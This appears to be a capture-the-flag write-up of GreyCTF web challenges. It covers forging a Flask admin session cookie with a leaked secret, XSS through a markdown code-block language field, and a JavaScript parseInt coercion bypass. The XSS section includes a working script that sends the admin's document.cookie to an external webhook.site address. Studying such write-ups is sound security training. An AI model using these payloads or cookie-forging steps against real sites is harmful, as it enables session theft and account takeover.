✅Web Challs

Table of content

Baby Web (Flask session cookie)
Markdown Parser (XSS in markdown)
Greyctf Survey (parseInt issues)
Beautiful Styles (CSS Injection)
Fearless Concurrency
No SQL Injection

The web app is written in Flask. Check session cookie:

flask-unsign --decode --cookie 'eyJpc19hZG1pbiI6ZmFsc2V9.ZiNV-w.Umcx64Jf6IYqXHUDpmtp3GZPSYs'

The secret key is given in plaintext in the source code. Flip is_admin to True and forge Flask session cookie:

flask-unsign --sign --cookie "{'is_admin': True}" --secret 'baby-web'

View source code:

Visit /flag route and get flag.

Markdown Parser (XSS in markdown)

XSS injection point:

Test XSS in the language field:

```" onmouseover="alert(1)
/* code here */
```

This works since the payload is rendered as the following HTML code:

<pre><code class="language-"onmouseover="alert(1)">/* code here */</code></pre>

See if we can trigger without using any attribute:

```"></code></pre><script>alert(1)</script><pre><code>
```

It is possible to setal admin’s cookie since httpOnly flag is set to false:

Use webhook:

https://webhook.site/

Upgrade the payload for stealing admin’s cookie:

```"></code></pre><script>new Image().src="https://webhook.site/2e050fe1-0ffe-4c30-8dfa-2b0769240238/"+(document.cookie);</script><pre><code>
```

This payload forces the web app to send a GET request to our webhook.

Inject payload and get flag.

Greyctf Survey (parseInt issues)

Soft spot:

vote has must have type ‘number’, and it is between -1 and 1. Our goal is to let:

-0.42069 + parseInt(vote) > 1

The problem is, parseInt() is designed to parse string instead of number. When you feed numbers into it, it can trigger weird behavior:

So basically parseInt() converts function argument to string since we provided a number. For something like 0.09, it becomes "0.09", and it is evaluated as 0 since only the first character gets parsed. But if we provide something with many zeros like 0.00000009, it becomes "9e-8", so evaluated to 9. That breaks the assumption of the checks.